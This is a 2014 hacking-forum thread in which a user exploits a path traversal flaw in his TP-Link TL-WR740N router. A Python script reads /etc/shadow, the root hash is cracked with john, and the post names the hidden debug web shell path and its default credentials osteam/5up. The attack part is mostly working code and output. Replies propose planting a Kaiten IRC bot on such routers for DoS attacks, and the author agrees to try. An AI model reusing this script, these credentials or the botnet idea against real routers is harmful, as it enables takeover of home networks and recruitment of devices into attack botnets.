[Ligeti]

Hello
(dedicated to @"chmod")

Yes it's me again!

Ok, this is a story and not a tutorial or a project... also this is not a 0-day, I just found out that it is a very known vulnerability in TP-Link routers, but the implementation is what I want to show you + the story.

Lately I was hacking/pentesting routers (TP-Link, ZTE and BandLuxe), and I found lots of interesting stuff that I will post all in the forum as soon as possible, but to start with here is one!

I have a TL-WR740N router (it is an old one), that I was trying to gain access to its firmware which I think it is OpenWRT, but nmap reports that it is TP-Link WAP... so idk! I scanned the ports hoping to find an open Telnet or SSH port (ZTE router has TELNET port opened by the way!!!) but they are not, here is my primary scan:

Code:

ligeti-Studio-1558 ~ # nmap -sT 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

SO ... I went to test the graphical inteface (web interface of the router on http://192.168.0.1/), here how the page looks like:



A little about the interface, I checked the source code and found out that the webpage uses <frame> tags to load the site content.

Here is the source code:

Code:

<FRAMESET cols=160,55%,*>
<FRAMESET rows=72,* frameSpacing=0 frameBorder=0>
<FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no>
<FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize>
        </FRAMESET>
    <FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0>
    <FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1>
    </FRAMESET>

I thought to test the website for XSS first, but I didn't think that it would be easy (but not impossible and still an option of course), so... what to do? first I did a very basic checks and tested the web server against directory traversal, and here is how I did it:

• I made a list of the available directories/paths:
  • root, http://192.168.0.1/ which is represented by '/'
    
  • frames, http://192.168.0.1/frames/
    
  • images, http://192.168.0.1/images/
    
  • help, http://192.168.0.1/help/
    
  • userRpm (whatever that is), http://192.168.0.1/userRpm/
    
• I don't know how many directories I needed to go back to reach for /etc/shadow file (or /etc/passwd), and I attempted to test that manually anyway but with Firefox (for good security reason) you can't do for example: http://192.168.0.1/images/../../../etc/shadow, Firefox will simply filter out all the ../../ (@"Anima Templi" may explain this part better I believe), so ... I used python to automate the whole thing!
  

Something to notice here, that urllib - that I used to download the html pages - will return an error "IOError: ('http protocol error', 0, 'got a bad status line', None)" and exit if the target url is not ... an html file (I think), I really don't care about this issue as I personally don't use urllib anymore (I switched to mechanize a while ago) but... anyway (this is just a notice)!

My full script:

Code:

import urllib
import time

#How many directories do we want to go back (depth of the test)
depth = 10

host = 'http://192.168.0.1/'
path = '../'
target = 'etc/shadow'

htmltext = ''
fullpath = ''
limit = 0

# List of directories I want to test
directories = ['', 'frames/', 'images/','help/']

for i in range(1,depth):
    fullpath += path
    for directory in directories:
        url = host + directory + fullpath + target
        print "Testing: ", url
        try:
            htmltext = urllib.urlopen(url).read()
        except:
            pass
        if ("root" in htmltext):
            print url, " is vulnerable"
        else:
            time.sleep(2)
            continue

The program (more precisely urllib) will prompt for user/password, the default username and password for TL-W740N router is admin/admin (if not I could just use hydra or medusa to crack the password!)

The output:

Code:

Testing:  http://192.168.0.1/../etc/shadow
Testing:  http://192.168.0.1/frames/../etc/shadow
Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
Testing:  http://192.168.0.1/images/../etc/shadow
Testing:  http://192.168.0.1/help/../etc/shadow
Testing:  http://192.168.0.1/../../etc/shadow
Testing:  http://192.168.0.1/frames/../../etc/shadow
http://192.168.0.1/frames/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/images/../../etc/shadow
http://192.168.0.1/images/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/help/../../etc/shadow
http://192.168.0.1/help/../../etc/shadow  is vulnerable

So ... if you run this scrit with -i option (pyhon -i <script.py>) you will end in the interactive mode (good for debugging), so I checked the value of htmltext and what do you know

Code:

>>> print htmltext
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

Not bad so far! So now what?

I copied the line that has root account in it to a file and named it root.password, and using john:

Code:

john --show root.password

I got the password, it is 5up (default password I guess)

Anyway... now what? (this is interesting)

Well... I did my research, and this is what I found:

TP-Link routers has a hidden web shell, that you can access using this url:
http://192.168.0.1/userRpmNatDebugRpm265...dline.html

The user name is osteam, and the password is 5up, here how this interface looks like:


And there is a nmap script actually to test this vulnerability in TP-Link routers

Code:

nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
Nmap scan report for 192.168.0.1
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|  
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|  
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

By the way... I mirrored the website using webhttrack (httrack) but I didn't get anythig interesting... but when using the web shell, I went to the web directory and there is a folder names "userRpm" and there I found lots of interesting files, I am still digging into this router (I want to see if I can upload a file or add new commands maybe!)

Anyway...

Conclusion

TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured ... in fact you should be careful with the router you are using and double check and test it for security.

[note]: this is VERY interesting video about hacking routers (I applied that method on ZTE router and got great results)



Thanks

[chmod]

Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.

[Kaiten]

What is the top speed of those routers? You could use them in a botnet. :p

[Ligeti]

Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.

lol, sorry about that, it is 3:32 am here by the way!

We'll talk tomorrow then

Thanks

---

What is the top speed of those routers? You could use them in a botnet. :p

I have no idea ... I think 150Mbps, they are not bad if configured correctly.

Use them in a botnet? please explain

[Aut•ono•mous]

I actually use this router at my house. Visiting with my family for a while, but when I get home I'm definitely going to test this.

Bookmarked for now, & thank you for pointing out an exploit in the router I'm using!

Great walk-through, too. Very informational & impressive.

[Anima Templi]

It's actually part of the spec to remove such (/../). However, unlike a file system these dot-segments are only interpreted within the URI path hierarchy and are removed as part of the resolution process.

[coolshame]

Thank you my brother (Ligeti), you're very cleaver MAN

[Kaiten]

Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.

lol, sorry about that, it is 3:32 am here by the way!

We'll talk tomorrow then

Thanks

---

What is the top speed of those routers? You could use them in a botnet. :p

I have no idea ... I think 150Mbps, they are not bad if configured correctly.

Use them in a botnet? please explain

Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.

[Ligeti]

Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.

Good idea... I should test that one day soon!

Thanks

[Kaiten]

Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.

Good idea... I should test that one day soon!

Thanks

No problem, and good luck!